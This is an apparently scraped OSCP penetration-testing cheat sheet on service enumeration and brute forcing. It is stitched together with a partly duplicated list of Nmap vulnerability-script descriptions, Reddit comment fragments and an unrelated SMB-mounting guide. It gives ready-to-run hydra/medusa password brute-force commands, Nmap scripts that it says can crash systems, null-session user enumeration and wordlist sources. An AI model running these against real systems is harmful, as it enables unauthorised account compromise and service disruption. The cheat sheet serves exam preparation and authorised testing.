Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA ASDM Privilege Escalation Vulnerability (CVE-2014-2126).
http-vuln-cve2014-2127

Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SSL VPN Privilege Escalation Vulnerability (CVE-2014-2127).
http-vuln-cve2014-2128

Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SSL VPN Authentication Bypass Vulnerability (CVE-2014-2128).
http-vuln-cve2014-2129

Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SIP Denial of Service Vulnerability (CVE-2014-2129).
http-vuln-cve2014-3704

Exploits CVE-2014-3704 also known as ‘Drupageddon’ in Drupal. Versions < 7.32 of Drupal core are known to be affected.http-vuln-cve2014-8877

Exploits a remote code injection vulnerability (CVE-2014-8877) in WordPress CM Download Manager plugin. Versions <= 2.0.0 are known to be affected.
http-vuln-cve2015-1427

This script attempts to detect a vulnerability, CVE-2015-1427, which allows attackers to leverage features of this API to gain unauthenticated remote code execution (RCE).
http-vuln-cve2015-1635

Checks for a remote code execution vulnerability (MS15-034) in Microsoft Windows systems (CVE2015-2015-1635).
http-vuln-cve2017-5638

Detects whether the specified URL is vulnerable to the Apache Struts Remote Code Execution Vulnerability (CVE-2017-5638).
http-vuln-misfortune-cookie

Detects the RomPager 4.07 Misfortune Cookie vulnerability by safely exploiting it.
http-vuln-wnr1000-creds

A vulnerability has been discovered in WNR 1000 series that allows an attacker to retrieve administrator credentials with the router interface. Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA
http-wordpress-users

Enumerates usernames in WordPress blog/CMS installations by exploiting an information disclosure vulnerability existing in versions 2.6, 3.1, 3.1.1, 3.1.3 and 3.2-beta2 and possibly others.
ipmi-cipher-zero

IPMI 2.0 Cipher Zero Authentication Bypass Scanner. This module identifies IPMI 2.0 compatible systems that are vulnerable to an authentication bypass vulnerability through the use of cipher zero.
irc-botnet-channels

Checks an IRC server for channels that are commonly used by malicious botnets.
irc-unrealircd-backdoor

Checks if an IRC server is backdoored by running a time-based command (ping) and checking how long it takes to respond.
mysql-vuln-cve2012-2122

netbus-auth-bypass

Checks if a NetBus server is vulnerable to an authentication bypass vulnerability which allows full access without knowing the password.
qconn-exec

Attempts to identify whether a listening QNX QCONN daemon allows unauthenticated users to execute arbitrary operating system commands.
rdp-vuln-ms12-020

Checks if a machine is vulnerable to MS12-020 RDP vulnerability.
realvnc-auth-bypass

Checks if a VNC server is vulnerable to the RealVNC authentication bypass (CVE-2006-2369).
rmi-vuln-classloader

Tests whether Java rmiregistry allows class loading. The default configuration of rmiregistry allows loading classes from remote URLs, which can lead to remote code execution. The vendor (Oracle/Sun) classifies this as a design feature.
samba-vuln-cve-2012-1182

Checks if target machines are vulnerable to the Samba heap overflow vulnerability CVE-2012-1182.
smb-vuln-conficker

Detects Microsoft Windows systems infected by the Conficker worm. This check is dangerous and it may crash systems.
smb-vuln-cve2009-3103

Detects Microsoft Windows systems vulnerable to denial of service (CVE-2009-3103). This script will crash the service if it is vulnerable.
smb-vuln-ms06-025

Detects Microsoft Windows systems with Ras RPC service vulnerable to MS06-025.
smb-vuln-ms07-029

Detects Microsoft Windows systems with Dns Server RPC vulnerable to MS07-029.
smb-vuln-ms08-067

Detects Microsoft Windows systems vulnerable to the remote code execution vulnerability known as MS08-067. This check is dangerous and it may crash systems.smb-vuln-ms10-054

Tests whether target machines are vulnerable to the ms10-054 SMB remote memory corruption vulnerability.
smb-vuln-ms10-061

Tests whether target machines are vulnerable to ms10-061 Printer Spooler impersonation vulnerability.
smb-vuln-regsvc-dos

Checks if a Microsoft Windows 2000 system is vulnerable to a crash in regsvc caused by a null pointer dereference. This check will crash the service if it is vulnerable and requires a guest account or higher to work.
smtp-vuln-cve2010-4344

Checks for and/or exploits a heap overflow within versions of Exim prior to version 4.69 (CVE-2010-4344) and a privilege escalation vulnerability in Exim 4.72 and prior (CVE-2010-4345).
smtp-vuln-cve2011-1720

Checks for a memory corruption in the Postfix SMTP server when it uses Cyrus SASL library authentication mechanisms (CVE-2011-1720). This vulnerability can allow denial of service and possibly remote code execution.
smtp-vuln-cve2011-1764

Checks for a format string vulnerability in the Exim SMTP server (version 4.70 through 4.75) with DomainKeys Identified Mail (DKIM) support (CVE-2011-1764). The DKIM logging mechanism did not use format string specifiers when logging some parts of the DKIM-Signature header field. A remote attacker who is able to send emails, can exploit this vulnerability and execute arbitrary code with the privileges of the Exim daemon.
ssl-ccs-injection

Detects whether a server is vulnerable to the SSL/TLS “CCS Injection” vulnerability (CVE-2014-0224), first discovered by Masashi Kikuchi. The script is based on the ccsinjection.c code authored by Ramon de C Valle (https://gist.github.com/rcvalle/71f4b027d61a78c42607)
ssl-cert-intaddr

Reports any private (RFC1918) IPv4 addresses found in the various fields of an SSL service’s certificate. These will only be reported if the target address itself is not private. Nmap v7.30 or later is required.
ssl-dh-params

Weak ephemeral Diffie-Hellman parameter detection for SSL/TLS services.
ssl-heartbleed

Detects whether a server is vulnerable to the OpenSSL Heartbleed bug (CVE-2014-0160). The code is based on the Python script ssltest.py authored by Jared Stafford (jspenguin@jspenguin.org)
ssl-known-key

Checks whether the SSL certificate used by a host has a fingerprint that matches an included database of problematic keys.
ssl-poodle

Checks whether SSLv3 CBC ciphers are allowed (POODLE)
sslv2-drown

Determines whether the server supports SSLv2, what ciphers it supports and tests for CVE-2015-3197, CVE-2016-0703 and CVE-2016-0800 (DROWN)
supermicro-ipmi-conf

Attempts to download an unprotected configuration file containing plain-text user credentials in vulnerable Supermicro Onboard IPMI controllers.
tls-ticketbleed

Detects whether a server is vulnerable to the F5 Ticketbleed bug (CVE-2016-9244).
wdb-version

Detects vulnerabilities and gathers information (such as version numbers and hardware support) from VxWorks Wind DeBug agents.
Attempts to identify whether a listening QNX QCONN daemon allows unauthenticated users to execute arbitrary operating system commands.
rdp-vuln-ms12-020

Checks if a machine is vulnerable to MS12-020 RDP vulnerability.
realvnc-auth-bypass

Checks if a VNC server is vulnerable to the RealVNC authentication bypass (CVE-2006-2369).
rmi-vuln-classloader

Tests whether Java rmiregistry allows class loading. The default configuration of rmiregistry allows loading classes from remote URLs, which can lead to remote code execution. The vendor (Oracle/Sun) classifies this as a design feature.
samba-vuln-cve-2012-1182

Checks if target machines are vulnerable to the Samba heap overflow vulnerability CVE-2012-1182.
smb-vuln-conficker

Detects Microsoft Windows systems infected by the Conficker worm. This check is dangerous and it may crash systems.
smb-vuln-cve2009-3103

Detects Microsoft Windows systems vulnerable to denial of service (CVE-2009-3103). This script will crash the service if it is vulnerable.
smb-vuln-ms06-025

Detects Microsoft Windows systems with Ras RPC service vulnerable to MS06-025.
smb-vuln-ms07-029

Detects Microsoft Windows systems with Dns Server RPC vulnerable to MS07-029.
smb-vuln-ms08-067

Detects Microsoft Windows systems vulnerable to the remote code execution vulnerability known as MS08-067. This check is dangerous and it may crash systems.smb-vuln-ms10-054

Tests whether target machines are vulnerable to the ms10-054 SMB remote memory corruption vulnerability.
smb-vuln-ms10-061

Tests whether target machines are vulnerable to ms10-061 Printer Spooler impersonation vulnerability.
smb-vuln-regsvc-dos

Checks if a Microsoft Windows 2000 system is vulnerable to a crash in regsvc caused by a null pointer dereference. This check will crash the service if it is vulnerable and requires a guest account or higher to work.
smtp-vuln-cve2010-4344

Checks for and/or exploits a heap overflow within versions of Exim prior to version 4.69 (CVE-2010-4344) and a privilege escalation vulnerability in Exim 4.72 and prior (CVE-2010-4345).
smtp-vuln-cve2011-1720

Checks for a memory corruption in the Postfix SMTP server when it uses Cyrus SASL library authentication mechanisms (CVE-2011-1720). This vulnerability can allow denial of service and possibly remote code execution.
smtp-vuln-cve2011-1764

Checks for a format string vulnerability in the Exim SMTP server (version 4.70 through 4.75) with DomainKeys Identified Mail (DKIM) support (CVE-2011-1764). The DKIM logging mechanism did not use format string specifiers when logging some parts of the DKIM-Signature header field. A remote attacker who is able to send emails, can exploit this vulnerability and execute arbitrary code with the privileges of the Exim daemon.
ssl-ccs-injection

Detects whether a server is vulnerable to the SSL/TLS “CCS Injection” vulnerability (CVE-2014-0224), first discovered by Masashi Kikuchi. The script is based on the ccsinjection.c code authored by Ramon de C Valle (https://gist.github.com/rcvalle/71f4b027d61a78c42607)
ssl-cert-intaddr

Reports any private (RFC1918) IPv4 addresses found in the various fields of an SSL service’s certificate. These will only be reported if the target address itself is not private. Nmap v7.30 or later is required.
ssl-dh-params

Weak ephemeral Diffie-Hellman parameter detection for SSL/TLS services.
ssl-heartbleed

Detects whether a server is vulnerable to the OpenSSL Heartbleed bug (CVE-2014-0160). The code is based on the Python script ssltest.py authored by Jared Stafford (jspenguin@jspenguin.org)
ssl-known-key

Checks whether the SSL certificate used by a host has a fingerprint that matches an included database of problematic keys.
ssl-poodle

Checks whether SSLv3 CBC ciphers are allowed (POODLE)
sslv2-drown

Determines whether the server supports SSLv2, what ciphers it supports and tests for CVE-2015-3197, CVE-2016-0703 and CVE-2016-0800 (DROWN)
supermicro-ipmi-conf

Attempts to download an unprotected configuration file containing plain-text user credentials in vulnerable Supermicro Onboard IPMI controllers.
tls-ticketbleed

Detects whether a server is vulnerable to the F5 Ticketbleed bug (CVE-2016-9244).
wdb-version

Detects vulnerabilities and gathers information (such as version numbers and hardware support) from VxWorks Wind DeBug agents.

Share Button

Cheat Sheet How to pass the OSCP Offensive Security Certified Professional Exam Step-by-Step Guide- Directory/Service Brute Forcing – PART 3

Directory Brute Forcing and Service Brute Forcing

The OSCP exam will almost certainly have a service that you can brute force a local or admin account on, there will also be webservers that will have unlinked content that you can find such as password files, user accounts and developer portals that provide easy access.

You will need to gather wordlist files to perform these activities, links are provided at the bottom of this section for download.

 

DirBuster

This is a gui based directory brute forcing application that can be very quick if your system can support it.

Image result for dirbuster

 

A command line version that is very powerful is “dirb”

root@wittyserver:~/oscp/# dirb http://192.168.1.101/root/oscp/dirbuster/common.txt

—————–
DIRB v2.22
By The Dark Raver
—————–

URL_BASE: http://192.168.1.101/
WORDLIST_FILES: /root/oscp/dirbuster/common.txt

—————–

GENERATED WORDS: 1942

—- Scanning URL: http://192.168.1.101/ —-
==> DIRECTORY: http://192.168.1.101/assets/
==> DIRECTORY: http://192.168.1.101/passwords/

Brute forcing services:

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at http://www.thc.org/thc-hydra
Don’t use in military or secret service organizations, or for illegal purposes.

Supported services: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

 

root@wittyserver:~/oscp/# hydra -L /root/oscp/dirbuster/big.txt -P /root/wordlist/500-worst-passwords.txt ssh://192.168.1.101

hydra -l admin -P /usr/share/wordlists/rockyou.txt -o results.txt ssh://10.0.0.1

root@wittyserver:~# medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M ssh

Crack Passwords (hydra/THC bruter)
(need mil-dict.txt from Milw 0rm – cracked hashs)

FTP – hydra -l -P mil-dic.txt -f ftp -V

POP3 – hydra -l -P mil-dict.txt -f pop3 -V (may need to use -t 15 to limit concurrent connections)

SNMP – hydra -P mil-dict.txt -f -V

MS VPN – dos2unix words (whatever word list) cat words | thc-pptp-bruter VPN server

Wordlist

http://www.packetstormsecurity.org/Crackers/wordlists/
http://www.theargon.com/achilles/wordlists/
http://www.openwall.com/wordlists/
http://www.outpost9.com/files/WordLists.html

I like to keep 3 size word lists:

1. small and fast: usually based on the output of one of the tools i’m about to tell you about

2. medium: this is my custom list that I add passwords I find / crack and generally think are good to add. I’m pretty picky about what goes into this list

3. huge: any wordlist I come across gets added to this list, it gets sorted and uniqued and restored

Now the two tools that I like for the small list is are CeWL and wyd:

CeWL – http://www.digininja.org/projects/cewl.php
Wyd – http://www.remote-exploit.org/codes_wyd.html

They have some very similar lists of features, your mileage may vary. But they basically parse files and web pages for words and generate password lists based on the words found.

Update on Sunday, February 21, 2010 at 1:57AM by Rob Fuller

I missed one hell of a treasure trove of word lists:

http://trac.kismac-ng.org/wiki/wordlists
http://www.openwall.com/mirrors/
http://passwordz.info/
ftp://ftp.ox.ac.uk/pub/wordlists/
http://gdataonline.com/downloads/GDict/
http://theargon.com/achilles/wordlists/
http://theargon.com/achilles/wordlists/theargonlists/
ftp://ftp.cerias.purdue.edu/pub/dict/
http://www.outpost9.com/files/WordLists.html
http://www.securinfos.info/wordlists_dictionnaires.php
http://www.vulnerabilityassessment.co.uk/passwords.htm
http://packetstormsecurity.org/Crackers/wordlists/
http://www.ai.uga.edu/ftplib/natural-language/moby/
http://www.insidepro.com/eng/download.shtml
http://www.word-list.com/
http://www.cotse.com/tools/wordlists1.htm
http://www.cotse.com/tools/wordlists2.htm
http://www.phreak.org/index/archive01/hacking/wordlsts/wordlsts.shtml
http://www.indianz.ch/tools/doc/wordlists.zip
http://wordlist.sourceforge.net/
http://prdownloads.sourceforge.net/wepattack/wordlist.tar.gz?download
http://hacor.org/docs/hugelist.txt (broken link. Does anyone have it hosted elsewhere?)
shhh! – http://www.room362.com/storage/saved/hugelist.txt
http://ftp.sunet.se/pub/security/tools/net/Openwall/wordlists/
ftp://ftp.openwall.com/pub/wordlists/

http://www.skullsecurity.org/wiki/index.php/Passwords

hotmail: http://current.com/technology/91108676_email-password-leak-update-gmail-yahoo-aol-and-hotmail-hit-too.htm

rockyou: http://securitystream.info/data-breaches/easy-passwords-found-in-rockyou-data-leak/

http://wordlist.sourceforge.net/  (Kevin’s Word Lists)

http://www.phenoelit-us.org/dpl/dpl.html

http://www.offensive-security.com/wpa-tables/wpalist.txt.tar.bz2

http://www.renderlab.net/projects/WPA-tables/

https://github.com/jeanphorn/wordlist

Share Button

Cheat Sheet How to pass the OSCP Offensive Security Certified Professional Exam Step-by-Step Guide- ENUMERATING SERVICES – PART 2

ENUMERATING SERVICES

 

Enumeration Services is a vital next step, this will help us identify users, host information, protocol weaknesses and vulnerabilities we can use to our advantage.

nmap -vv -Pn -A -sC -sS -T 4 -p- 10.0.0.1
Web Enumeration:

dirb http://10.0.0.1 /usr/share/wordlists/dirb/common.txt

nikto –host http://10.0.0.1
SMB\RPC Enumeration:

Netbios/SMB

smb4k (graphical interface – lists shares)

smbserverscan
metasploit auxiliary scanner

./msfconsole show
use scanner/smb/version

set RHOSTS 192.168.0.1-192.168.0.254

run
Enumerate Usernames (SNMP/SMTP/SMB[NETBIOS]/Add others here)
For SMB

nmap -sT -p 445 192.168.9.200-254 -oG smb_results.txt (then grep open sessions) (on my machine /root/offsec) ./samrdump.py 192.168.9.201 (results from above)

enum4linux 10.0.0.1

nmap –script=smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse,smbv2-enabled.nse 10.0.0.1
Mysql Enumeration:

nmap -sV -Pn -vv –script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.0.0.1 -p 3306
SMTP Enumeration:

nmap –script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1
SNMP Enumeration:

snmpwalk -c public -v1 192.168.9.254 1 |grep hrSWRunName|cut -d” ” -f

snmpwalk -c public -v1 10.0.0.0

snmpenum -t 192.168.0.100 (displays all snmp informations for that server)

nmap -sT -p 161 192.168.9.200/254 -oG snmp_results.txt (then grep)

– snmpwalk public -v1 192.168.9.201 1 |grep 77.1.2.25 |cut -d” “ -f4

For SMTP – (/pentest/enumeration/vrfy)

./smtp_VRFY.py

** NEED TO MAKE THREADED – VERY SLOW **
SAMRDUMP.PY – (/pentest/python/impacket-examples/samrdump.py)

– ./samrdump.py SNMP server

nc -v 25
FTP Enumeration:

nmap –script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 10.0.0.1

 

DNS ENUMERATION

he types of enumeration that performs include the following:

  • Zone Transfer
  • Reverse Lookup
  • Domain and Host Brute-Force
  • Standard Record Enumeration (wildcard,SOA,MX,A,TXT etc.)
  • Cache Snooping
  • Zone Walking
  • Google Lookup

Standard Record Enumeration

In order to perform standard DNS enumeration with the DNSRecon the command that we have to use is the ./dnsrecon.py -d <domain>.So let’s try that command against the domain cisco.com to see what kind of information can we retrieve.

Zone Transfer

The security problem with DNS zone transfer is that it can be used to decipher the topology of a company’s network.Specifically when a user is trying to perform a zone transfer it sends a DNS query to list all DNS information like name servers,host names,MX and CNAME records,zone serial number,Time to Live records etc.Due to the amount of information that can be obtained DNS zone transfer cannot be easily found in nowadays.However DNSRecon provides the ability to perform Zone Transfers with the commands

./dnsrecon.py -d <domain> -a or

./dnsrecon.py -d <domain> -t axfr

Reverse Lookup

According to Wikipedia reverse DNS lookup is the determination of a domain name with the associated IP address.DNSRecon can perform a reverse lookup for PTR (Pointer) records against IPv4 and IPv6 address ranges.To run reverse lookup enumeration the command

./dnsrecon.py -r <startIP-endIP>

must be used.Also reverse lookup can be performed against all ranges in SPF records with the command ./dnsrecon.py -d <domain> -s.In the next image you can see the output that produces a reverse lookup in a range of IP addresses.

Domain Brute-Force

For performing this technique all we have to do is to give a name list and it will try to resolve the A,AAA and CNAME records against the domain by trying each entry one by one.In order to run the Domain Name Brute-Force we need to type:

./dnsrecon.py -d <domain> -D <namelist> -t brt

Cache Snooping

DNS cache snooping is occurred when the DNS server has a specific DNS record cached.This DNS record will often reveal plenty of information.However DNS cache snooping is not happening very often.The command that can be used in order to perform cache snooping is the following:

./dnsrecon.py -t snoop -n Sever -D <Dict>

Zone Walking

This technique may unveils internal records if zone is not configured properly.The information that can be obtained can help us to map network hosts by enumerating the contents of a zone.In order to perform the zone walking we need to type the command:

./dnsrecon.py -d <host> -t zonewalk

SMB\RPC Enumeration:
enum4linux 10.0.0.1

nmap –script=smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse,smbv2-enabled.nse 10.0.0.1
You can also use:
nmap –script=smb* -p 139,445 10.0.0.1
permalinkembedsavereportgive goldreply
[–]ok_bye_now_[S] 1 point 2 months ago
If you run all of them it’ll take forever because of the brute force NSE scripts. That’s why I chose to list all of them minus the bruters.
permalinkembedsaveparentreportgive goldreply
[–]ak_z 6 points 2 months ago*
nicie, but I’ve seen better
permalinkembedsavereportgive goldreply
[–]m_ros101 2 points 2 months ago
Great work mate. Thanks for this.
permalinkembedsavereportgive goldreply
[–]ok_bye_now_[S] 1 point 2 months ago
Enumerating snmp strings is also something I should add to that list. It’s fairly easy to overlook but you sometimes find really useful information in there.
permalinkembedsavereportgive goldreply
[–]qasimchadhar 1 point 2 months ago
Thanks. One thing to note, these cheat sheets will come handy in your professional career too. And as you learn something new, be sure to add to your favorite cheat sheet.
permalinkembedsavereportgive goldreply
nmap -PN 192.168.9.200-254

rpcclient $>

Now type in enumdomusers, this will dump a list of user accounts that are present on the share like so:

rpcclient $> enumdomusers
user:[nobody] rid:[0x1f5]
user:[gh0s7] rid:[0x3e8]

Yes enumerating user accounts through open samba or smb is that simple. There are many more options that can be used with this program, if you type help at the rpcclient prompt you will see all of the options. There are a few different commands that I used to create the log file for this tutorial.
1)enumdomusers
2)netshareenum
3)netshareenumall
4)querydominfo

****Append Log File****
/*NULL SESSION CONNECTION*/
root@bt:~# rpcclient -U “” 192.168.1.12
Enter ‘s password:

/*ENUMERATING USERS*/
rpcclient $> enumdomusers
user:[nobody] rid:[0x1f5]
user:[gh0s7] rid:[0x3e8]
/*FINDING NETWORK SHARE INFO ON THE LOCAL MACHINE*/
rpcclient $> netshareenum
netname: test
remark:
path: C:\media\Gh0$7\test
password:
/*OR*/
rpcclient $> netshareenumall
netname: IPC$
remark: IPC Service (gh0s7-serverhome server (Samba, Ubuntu))
path: C:\tmp
password:
netname: test
remark:
path: C:\media\Gh0$7\test
password:
netname: print$
remark: Printer Drivers
path: C:\var\lib\samba\printers
password:

/*QUERYING SERVER INFO (NAME AND DOMAIN)*/
rpcclient $> querydominfo
Domain: MSHOME
Server: GH0S7-SERVERHOME
Comment: gh0s7-serverhome server (Samba, Ubuntu)
Total Users: 2
Total Groups: 0
Total Aliases: 0
Sequence No: 1321411072
Force Logoff: -1
Domain Server State: 0x1
Server Role: ROLE_DOMAIN_PDC
Unknown 3: 0x1

Mounting unprotected (guest) network folders

First, let’s create the mount directory. You will need a separate directory for each mount.

sudo mkdir /media/windowsshare

Then edit your /etc/fstab file (with root privileges) to add this line:

//servername/sharename  /media/windowsshare  cifs  guest,uid=1000,iocharset=utf8  0  0

Where

guest indicates you don’t need a password to access the share,

uid=1000 makes the Linux user specified by the id the owner of the mounted share, allowing them to rename files,

iocharset=utf8 allows access to files with names in non-English languages. This doesn’t work with shares of devices like the Buffalo Tera Station, or Windows machines that export their shares using ISO8895-15.

If there is any space in the server path, you need to replace it by \040, for example //servername/My\040Documents

After you add the entry to /etc/fstab type:

sudo mount -a

This will (re)mount all entries listed in /etc/fstab.

Mount password protected network folders

The quickest way to auto-mounting a password-protected share is to edit /etc/fstab (with root privileges), to add this line:
//servername/sharename  /media/windowsshare  cifs  username=msusername,password=mspassword,iocharset=utf8,sec=ntlm  0  0

To see which shares are available on a given host, run:

/usr/bin/smbclient -L host

where ‘host’ is the name of the machine that you wish to view. this will return a list of ‘service’ names – that is, names of drives or printers that it can share with you. Unless the SMB server has no security configured, it will ask you for a password. Get it the password for the ‘guest’ account or for your personal account on that machine.

For example:

smbclient -L zimmerman

The output of this command should look something like this:

Server time is Sat Aug 10 15:58:27 1996
Timezone is UTC+10.0
Password:
Domain=[WORKGROUP] OS=[Windows NT 3.51] Server=[NT LAN Manager 3.51]

Server=[ZIMMERMAN] User=[] Workgroup=[WORKGROUP] Domain=[]

Sharename      Type      Comment
———      —-      ——-
ADMIN$         Disk      Remote Admin
public         Disk      Public
C$             Disk      Default share
IPC$           IPC       Remote IPC
OReilly        Printer   OReilly
print$         Disk      Printer Drivers

Share Button